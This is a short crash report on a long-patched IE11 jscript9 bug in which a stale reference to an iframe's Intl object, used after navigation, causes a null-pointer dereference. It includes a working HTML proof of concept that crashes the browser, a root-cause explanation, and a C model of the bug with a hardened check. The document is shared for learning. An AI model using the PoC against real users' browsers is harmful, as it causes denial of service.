A brief crash report. Saving a reference to an iframe's Intl object in the parent document and then navigating the iframe to about:blank caused a null pointer dereference in jscript9!ArenaAllocator::AllocZero when the cached reference was touched afterwards. The PoC below keeps the stale reference in a parent-window global and accesses it from a timer once the navigation has completed.
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>IE11_DoS_access_destroyed_Intl</title>
</head>
<!-- main() has to run after the iframe exists, so it is wired to body onload -->
<body onload="main()">
<iframe width="50" height="20"></iframe>
<script>
var pIntl;
function main()
{
// cache the child frame's Intl object in the parent window
pIntl = window[0].Intl;
// navigate the child away; its script context is torn down
window[0].location = "about:blank";
// touch the stale reference once the navigation has had time to complete
setTimeout("alert(pIntl);", 100);
}
</script>
</body>
</html>
When the iframe navigated away, its script context was torn down and the Intl object's backing state went with it, but the parent still held pIntl. Calling alert(pIntl) converted the stale object to a string, which triggered lazy initialization of the Intl object in the new (empty) script context; that context had no usable arena allocator yet, so jscript9!ArenaAllocator::AllocZero dereferenced a null pointer. The crash was classified as PROBABLY_NOT_EXPLOITABLE: a deterministic null dereference with no attacker-controlled address, so a denial of service rather than a code-execution primitive.
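To make the lifecycle concrete, here is a small C model of the bug class and of the check that avoids it. This is an added illustration, not jscript9 source: the types ScriptContext, ArenaAllocator and IntlObject, the function names and the 64-byte state size are all assumptions. The model collapses "old context closed" and "new context with no arena" into one state, a context whose arena pointer is null, which is what AllocZero saw in either case.

```c
/* Added model of the crash lifecycle (not jscript9 code; all names assumed).
 * A script context owns an arena; a built-in object created in that context
 * lazily allocates its state through the arena on first use. Navigation
 * closes the context and nulls the arena, but cached references survive. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdbool.h>

#define ARENA_SIZE 4096
#define INTL_STATE_SIZE 64   /* assumed size of the lazily built state */

typedef struct { unsigned char *base; size_t used, cap; } ArenaAllocator;
typedef struct { ArenaAllocator *arena; bool closed; } ScriptContext;
typedef struct { ScriptContext *ctx; void *state; } IntlObject;

/* Bump allocation with zero fill. Dereferences `a` unconditionally: with a
 * null arena this is the AllocZero null dereference from the crash report. */
static void *arena_alloc_zero(ArenaAllocator *a, size_t n) {
    if (a->used + n > a->cap) return NULL;
    void *p = a->base + a->used;
    memset(p, 0, n);
    a->used += n;
    return p;
}

static ScriptContext *context_create(void) {
    ScriptContext *c = calloc(1, sizeof *c);
    ArenaAllocator *a = calloc(1, sizeof *a);
    if (!c || !a) { free(c); free(a); return NULL; }
    a->base = malloc(ARENA_SIZE);
    a->cap = ARENA_SIZE;
    c->arena = a;
    return c;
}

/* Navigation away: the arena is released and nulled. Objects holding a
 * pointer to the context are not told. */
static void context_close(ScriptContext *c) {
    if (c->arena) { free(c->arena->base); free(c->arena); }
    c->arena = NULL;
    c->closed = true;
}

static IntlObject *intl_create(ScriptContext *c) {
    IntlObject *o = calloc(1, sizeof *o);
    if (o) o->ctx = c;
    return o;
}

/* Vulnerable lazy init: trusts that the owning context is still alive.
 * After context_close() this passes a null arena to arena_alloc_zero. */
static void *intl_ensure_init_unchecked(IntlObject *o) {
    if (!o->state) o->state = arena_alloc_zero(o->ctx->arena, INTL_STATE_SIZE);
    return o->state;
}

/* Hardened lazy init: refuse to build state in a closed context and report
 * failure to the caller instead of touching the missing arena. */
static void *intl_ensure_init_checked(IntlObject *o) {
    if (o->ctx->closed || o->ctx->arena == NULL) return NULL;
    if (!o->state) o->state = arena_alloc_zero(o->ctx->arena, INTL_STATE_SIZE);
    return o->state;
}

/* Replays the PoC with the checked variant: cache, navigate, touch.
 * Returns 1 when the stale access is safely refused. */
static int replay_after_navigation(void) {
    ScriptContext *ctx = context_create();
    IntlObject *cached = intl_create(ctx);          /* pIntl = window[0].Intl */
    context_close(ctx);                             /* location = "about:blank" */
    int refused = intl_ensure_init_checked(cached) == NULL;  /* alert(pIntl) */
    free(cached); free(ctx);
    return refused;
}

/* Control: before navigation both variants initialise successfully. */
static int replay_before_navigation(void) {
    ScriptContext *ctx = context_create();
    IntlObject *cached = intl_create(ctx);
    int ok = intl_ensure_init_unchecked(cached) != NULL
          && intl_ensure_init_checked(cached) != NULL;
    context_close(ctx);
    free(cached); free(ctx);
    return ok;
}

int main(void) {
    printf("live access ok: %d\n", replay_before_navigation());
    printf("stale access refused: %d\n", replay_after_navigation());
    return 0;
}
```

Running the unchecked variant after context_close() is deliberately left out of the replay functions, since in this model it reproduces the null dereference rather than a catchable error; the point of the checked variant is that the object's owning context, not the caller, is what decides whether lazy initialization may proceed.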
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.